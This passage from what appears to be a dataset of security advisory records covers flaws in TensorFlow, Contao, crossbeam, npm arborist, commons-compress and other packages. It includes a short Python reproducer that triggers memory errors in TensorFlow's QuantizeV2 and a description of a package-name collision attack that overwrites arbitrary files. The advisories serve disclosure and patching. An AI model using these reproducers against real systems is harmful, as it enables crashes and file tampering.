+https://contao.org/en/security-advisories/cross-site-scripting-via-html-attributes-in-the-back-end
+
+### For more information
+
+If you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose).
+
+### Credits
+
+Thanks to Mikhail Khramenkov and Moritz Vondano for reporting this security issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'contao/core-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.4.56'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'contao/core-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.9.0'}, {'fixed': '4.9.18'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'contao/core-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.11.0'}, {'fixed': '4.11.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/contao/contao/security/advisories/GHSA-hr3h-x6gq-rqcp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-35955'}, {'type': 'WEB', 'url': 'https://contao.org/en/news/contao-4-9-16-and-4-11-5-are-available.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/contao/contao'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T18:55:48Z', 'nvd_published_at': '2021-08-12T15:15:00Z'}"
+1.4.0,GHSA-g25h-jr74-qp5j,2021-08-24T13:40:09Z,2021-08-25T14:42:23Z,,['CVE-2021-37663'],Incomplete validation in `QuantizeV2`,"### Impact
+Due to incomplete validation in `tf.raw_ops.QuantizeV2`, an attacker can trigger undefined behavior via binding a reference to a null pointer or can access data outside the bounds of heap allocated arrays:
+
+```python
+import tensorflow as tf
+
+tf.raw_ops.QuantizeV2(
+ input=[1,2,3],
+ min_range=[1,2],
+ max_range=[],
+ T=tf.qint32,
+ mode='SCALED',
+ round_mode='HALF_AWAY_FROM_ZERO',
+ narrow_range=False,
+ axis=1,
+ ensure_minimum_range=3)
+```
+
+The [implementation](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/quantize_op.cc#L59) has some validation but does not check that `min_range` and `max_range` both have the same non-zero number of elements. If `axis` is provided (i.e., not `-1`), then validation should check that it is a value in range for the rank of `input` tensor and then the lengths of `min_range` and `max_range` inputs match the `axis` dimension of the `input` tensor.
+
+### Patches
+We have patched the issue in GitHub commit [6da6620efad397c85493b8f8667b821403516708](https://github.com/tensorflow/tensorflow/commit/6da6620efad397c85493b8f8667b821403516708).
+
+The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-g25h-jr74-qp5j'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37663'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/6da6620efad397c85493b8f8667b821403516708'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow/'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T13:40:09Z', 'nvd_published_at': '2021-08-12T23:15:00Z'}"
+1.4.0,GHSA-pqqp-xmhj-wgcw,2022-08-10T23:46:42Z,2021-08-25T21:01:15Z,,['CVE-2021-32810'],crossbeam-deque Data Race before v0.7.4 and v0.8.1,"### Impact
+
+In the affected version of this crate, the result of the race condition is that one or more tasks in the worker queue can be popped twice instead of other tasks that are forgotten and never popped. If tasks are allocated on the heap, this can cause double free and a memory leak. If not, this still can cause a logical bug.
+
+Crates using `Stealer::steal`, `Stealer::steal_batch`, or `Stealer::steal_batch_and_pop` are affected by this issue.
+
+### Patches
+
+This has been fixed in crossbeam-deque 0.8.1 and 0.7.4.
+
+### Credits
+
+This issue was reported and fixed by Maor Kleinberger.
+
+### License
+
+This advisory is in the public domain.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'crossbeam-deque'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.4'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'crossbeam-deque'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.8.0'}, {'fixed': '0.8.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/crossbeam-rs/crossbeam/security/advisories/GHSA-pqqp-xmhj-wgcw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32810'}, {'type': 'PACKAGE', 'url': 'https://github.com/crossbeam-rs/crossbeam'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7EZILHZDRGDPOBQ4KTW3E5PPMKLHGH5N/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AWHNNBJCU4EHA2X5ZAMJMGLDUYS5FEPP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYBSLIYFANZLCYWOGTIYZUM26TJRH7WU/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CY5T3FCE4MUYSPKEWICLVJBBODGJ6SZE/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EW5B2VTDVMJ6B3DA4VLMAMW2GGDCE2BK/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LCIBFGBSL3JSVJQTNEDEIMZGZF23N2KE/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCLMH7B7B2MF55ET4NQNPH7JWISFX4RT/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RRPKBRXCRNGNMVFQPFD4LM3QKPEMBQQR/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFUBWBYCPSSXTJGEAQ67CJUNQJBOCM26/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U3LSN3B43TJSFIOB3QLPBI3RCHRU5BLO/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VQZIEJQBV3S72BHD5GKJQF3NVYNRV5CF/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WGB2H35CTZDHOV3VLC5BM6VFGURLLVRP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XFBZWCLG7AGLJO4A7K5IMJVPLSWZ5TJP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQDIBB7VR3ER52FMSMNJPAWNDO5SITCE/'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0093.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T22:34:26Z', 'nvd_published_at': '2021-08-02T19:15:00Z'}"
+1.4.0,GHSA-m8h8-v6jh-c762,2023-06-13T17:11:53Z,2021-08-25T20:49:43Z,,['CVE-2020-35904'],Incorrect buffer size in crossbeam-channel,The affected version of this crate's the bounded channel incorrectly assumes that Vec::from_iter has allocated capacity that same as the number of iterator elements. Vec::from_iter does not actually guarantee that and may allocate extra memory. The destructor of the bounded channel reconstructs Vec from the raw pointer based on the incorrect assumes described above. This is unsound and causing deallocation with the incorrect capacity when Vec::from_iter has allocated different sizes with the number of iterator elements.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'crossbeam-channel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.4.3'}, {'fixed': '0.4.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35904'}, {'type': 'WEB', 'url': 'https://github.com/crossbeam-rs/crossbeam/pull/533'}, {'type': 'PACKAGE', 'url': 'https://github.com/crossbeam-rs/crossbeam'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0052.html'}]","{'cwe_ids': ['CWE-131'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:51:01Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hv87-47h9-jcvq,2023-06-13T22:23:08Z,2021-08-25T20:43:13Z,,['CVE-2018-20993'],Uncontrolled recursion in rust-yaml,Affected versions of this crate did not prevent deep recursion while deserializing data structures. This allows an attacker to make a YAML file with deeply nested structures that causes an abort while deserializing it. The flaw was corrected by checking the recursion depth.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'yaml-rust'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-20993'}, {'type': 'WEB', 'url': 'https://github.com/chyh1990/yaml-rust/pull/109'}, {'type': 'WEB', 'url': 'https://github.com/chyh1990/yaml-rust/commit/d61b49cb90391fc4f7f72a1abe597476c8651a07'}, {'type': 'PACKAGE', 'url': 'https://github.com/chyh1990/yaml-rust'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2018-0006.html'}]","{'cwe_ids': ['CWE-674'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:24:44Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2h3h-q99f-3fhc,2022-08-15T20:08:31Z,2021-08-31T16:04:03Z,,['CVE-2021-39134'],@npmcli/arborist vulnerable to UNIX Symbolic Link (Symlink) Following,"### Impact
+
+Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution
+
+`@npmcli/arborist`, the library that calculates dependency trees and manages the `node_modules` folder hierarchy for the npm command line interface, aims to guarantee that package dependency contracts will be met, and the extraction of package contents will always be performed into the expected folder.
+
+This is, in part, accomplished by resolving dependency specifiers defined in `package.json` manifests for dependencies with a specific name, and nesting folders to resolve conflicting dependencies.
+
+When multiple dependencies differ only in the case of their name, Arborist's internal data structure saw them as separate items that could coexist within the same level in the `node_modules` hierarchy. However, on case-insensitive file systems (such as macOS and Windows), this is not the case. Combined with a symlink dependency such as `file:/some/path`, this allowed an attacker to create a situation in which arbitrary contents could be written to any location on the filesystem.
+
+For example, a package `pwn-a` could define a dependency in their `package.json` file such as `""foo"": ""file:/some/path""`. Another package, `pwn-b` could define a dependency such as `FOO: ""file:foo.tgz""`. On case-insensitive file systems, if `pwn-a` was installed, and then `pwn-b` was installed afterwards, the contents of `foo.tgz` would be written to `/some/path`, and any existing contents of `/some/path` would be removed.
+
+Anyone using npm v7.20.6 or earlier on a case-insensitive filesystem is potentially affected.
+
+### Patches
+
+2.8.2 (included in npm v7.20.7 and above)
+
+### Fix and Caveats
+
+There are two parts to the fix:
+
+1. Immediately prior to extraction, if the target folder is not a directory, it is moved aside. (If the installation fails, filesystem entries moved aside in this manner are moved back as part of the rollback process.)
+2. The `children` map that represents child nodes in the tree is replaced with a case-insensitive map object, such that `node.children.get('foo')` and `node.children.get('FOO')` will return the same object, enabling Arborist to detect and handle this class of tree collision.
+
+This second item imposes a caveat on case _sensitive_ filesystems where two packages with names which differ only in case may already exist at the same level in the tree, causing unpredictable behavior in this rare edge case. Note that in such cases, the `package-lock.json` already creates a situation which is hazardous to use on case-sensitive filesystems, and will likely lead to other problems.
+
+If affected by this caveat, please run `npm update` to rebuild your tree and generate a new `package-lock.json` file.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@npmcli/arborist'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/npm/arborist/security/advisories/GHSA-2h3h-q99f-3fhc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39134'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf'}, {'type': 'PACKAGE', 'url': 'https://github.com/npm/arborist'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@npmcli/arborist'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-178', 'CWE-59', 'CWE-61'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-31T16:02:46Z', 'nvd_published_at': '2021-08-31T17:15:00Z'}"
+1.4.0,GHSA-mc84-pj99-q6hh,2022-02-08T21:03:07Z,2021-08-02T16:55:53Z,,['CVE-2021-36090'],Improper Handling of Length Parameter Inconsistency in Compress,"When reading a specially crafted ZIP archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' zip package.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.commons:commons-compress'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.21'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36090'}, {'type': 'WEB', 'url': 'https://commons.apache.org/proper/commons-compress/security-reports.html'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0e87177f8e78b4ee453cd4d3d8f4ddec6f10d2c27707dd71e12cafc9@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r25f4c44616045085bc3cf901bb7e68e445eee53d1966fc08998fc456@%3Cdev.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3227b1287e5bd8db6523b862c22676b046ad8f4fc96433225f46a2bd@%3Cissues.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4f03c5de923e3f2a8c316248681258125140514ef3307bfe1538e1ab@%3Cdev.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r54049b66afbca766b6763c7531e9fe7a20293a112bcb65462a134949@%3Ccommits.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r67ef3c07fe3b8c1b02d48012149d280ad6da8e4cec253b527520fb2b@%3Cdev.poi.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r75ffc7a461e7e7ae77690fa75bd47bb71365c732e0fbcc44da4f8ff5@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9a23d4dbf4e34d498664080bff59f2893b855eb16dae33e4aa92fa53@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9f54c0caa462267e0cc68b49f141e91432b36b23348d18c65bd0d040@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rab292091eadd1ecc63c516e9541a7f241091cf2e652b8185a6059945@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/racd0c0381c8404f298b226cd9db2eaae965b14c9c568224aa3f437ae@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb064d705fdfa44b5dae4c366b369ef6597951083196321773b983e71@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb5fa2ee61828fa2e42361b58468717e84902dd71c4aea8dc0b865df7@%3Cnotifications.james.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb6e1fa80d34e5ada45f72655d84bfd90db0ca44ef19236a49198c88c@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb7adf3e55359819e77230b4586521e5c6874ce5ed93384bdc14d6aee@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rba65ed5ddb0586f5b12598f55ec7db3633e7b7fede60466367fbf86a@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbbf42642c3e4167788a7c13763d192ee049604d099681f765385d99d@%3Cdev.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbe91c512c5385181149ab087b6c909825d34299f5c491c6482a2ed57@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc4134026d7d7b053d4f9f2205531122732405012c8804fd850a9b26f%40%3Cuser.commons.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc7df4c2f0bbe2028a1498a46d322c91184f7a369e3e4c57d9518cacf@%3Cdev.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd4332baaf6debd03d60deb7ec93bee49e5fdbe958cb6800dff7fb00e@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdd5412a5b9a25aed2a02c3317052d38a97128314d50bc1ed36e81d38@%3Cuser.ant.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf2f4d7940371a7c7c5b679f50e28fc7fcc82cd00670ced87e013ac88@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf3f0a09fee197168a813966c5816157f6c600a47313a0d6813148ea6@%3Cissues.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf93b6bb267580e01deb7f3696f7eaca00a290c66189a658cf7230a1a@%3Cissues.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfba19167efc785ad3561e7ef29f340d65ac8f0d897aed00e0731e742@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211022-0001/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/07/13/4'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/07/13/6'}]","{'cwe_ids': ['CWE-130'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-14T19:37:10Z', 'nvd_published_at': '2021-07-13T08:15:00Z'}"
+1.4.0,GHSA-9f8c-f7h4-xghf,2021-05-04T22:11:39Z,2021-08-02T17:28:53Z,,['CVE-2020-1057'],Remote code execution in ChakraCore,"A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1172, CVE-2020-1180.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.22'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1057'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/pull/6500'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1057'}]","{'cwe_ids': ['CWE-119', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T22:11:39Z', 'nvd_published_at': '2020-09-11T17:15:00Z'}"
+1.4.0,GHSA-gq4h-f254-7cw9,2023-06-13T21:53:00Z,2021-08-25T21:00:34Z,,[],Data races in ticketed_lock,"Affected versions of this crate unconditionally implemented `Send` for `ReadTicket` & `WriteTicket`.
+This allows to send non-Send `T` to other threads.
+
+This can allows creating data races by cloning types with internal mutability and sending them to other threads (as `T` of `ReadTicket`/`WriteTicket`). Such data races can cause memory corruption or other undefined behavior.
+
+The flaw was corrected in commit `a986a93` by adding `T: Send` bounds to `Send` impls of `ReadTicket`/`WriteTicket`.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'ticketed_lock'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/kvark/ticketed_lock/issues/7'}, {'type': 'WEB', 'url': 'https://github.com/kvark/ticketed_lock/commit/a986a9335d591fa5c826157d1674d47aa525357f'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0119.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-05T21:48:24Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h3mf-4fwp-59c7,2021-08-24T18:08:17Z,2021-08-05T19:58:06Z,2021-08-24T18:08:17Z,[],VecStorage Deserialize Allows Violation of Length Invariant,"The `Deserialize` implementation for `VecStorage` did not maintain the invariant that the number of elements must equal `nrows * ncols`. Deserialization of specially crafted inputs could allow memory access beyond allocation of the vector.
+
+This flaw was introduced in v0.11.0 ([`086e6e`](https://github.com/dimforge/nalgebra/commit/086e6e719f53fecba6dadad2e953a487976387f5)) due to the addition of an automatically derived implementation of `Deserialize` for `MatrixVec`. `MatrixVec` was later renamed to `VecStorage` in v0.16.13 ([`0f66403`](https://github.com/dimforge/nalgebra/commit/0f66403cbbe9eeac15cedd8a906c0d6a3d8841f2)) and continued to use the automatically derived implementation of `Deserialize`.
+
+This flaw was corrected in commit [`5bff536`](https://github.com/dimforge/nalgebra/commit/5bff5368bf38ddfa31416e4ae9897b163031a513) by returning an error during deserialization if the number of elements does not exactly match the expected size.
+",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'nalgebra'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.11.0'}, {'fixed': '0.27.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dimforge/nalgebra/issues/883'}, {'type': 'WEB', 'url': 'https://github.com/dimforge/nalgebra/pull/889'}, {'type': 'WEB', 'url': 'https://github.com/dimforge/nalgebra/commit/a803271fcce75b7c151e92aa099dfa546db4adc5'}, {'type': 'PACKAGE', 'url': 'https://github.com/dimforge/nalgebra'}, {'type': 'WEB', 'url': 'https://github.com/dimforge/nalgebra/blob/dev/CHANGELOG.md#0270'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0070.html'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-05T19:57:42Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wgx2-6432-j3fw,2021-08-19T21:07:53Z,2021-08-25T20:48:04Z,,['CVE-2020-35880'],Unsoundness in bigint,An issue was discovered in the bigint crate through 2020-05-07 for Rust. It allows a soundness violation.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'bigint'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.4.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35880'}, {'type': 'WEB', 'url': 'https://github.com/rustsec/advisory-db/pull/290'}, {'type': 'WEB', 'url': 'https://github.com/paritytech/bigint/commit/7e71521a61b009afc94c91135353102658550d42'}, {'type': 'PACKAGE', 'url': 'https://github.com/paritytech/bigint'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0025.html'}]","{'cwe_ids': ['CWE-704'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:07:53Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cmgw-8vpc-rc59,2021-08-24T18:47:39Z,2021-08-25T14:38:57Z,,['CVE-2021-37692'],"Segfault on strings tensors with mistmatched dimensions, due to Go code","### Impact
+Under certain conditions, Go code can trigger a segfault in string deallocation.
+
+
+For string tensors, `C.TF_TString_Dealloc` is called during garbage collection within a finalizer function. However, tensor structure isn't checked until encoding to avoid a performance penalty. The current method for dealloc assumes that encoding succeeded, but segfaults when a string tensor is garbage collected whose encoding failed (e.g., due to mismatched dimensions).
+
+To fix this, the call to set the finalizer function is deferred until `NewTensor` returns and, if encoding failed for a string tensor, deallocs are determined based on bytes written.
+
+### Patches
+We have patched the issue in GitHub commit [8721ba96e5760c229217b594f6d2ba332beedf22](https://github.com/tensorflow/tensorflow/commit/8721ba96e5760c229217b594f6d2ba332beedf22) (merging [#50508](https://github.com/tensorflow/tensorflow/pull/50508)).
+
+The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, which is the other affected version.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
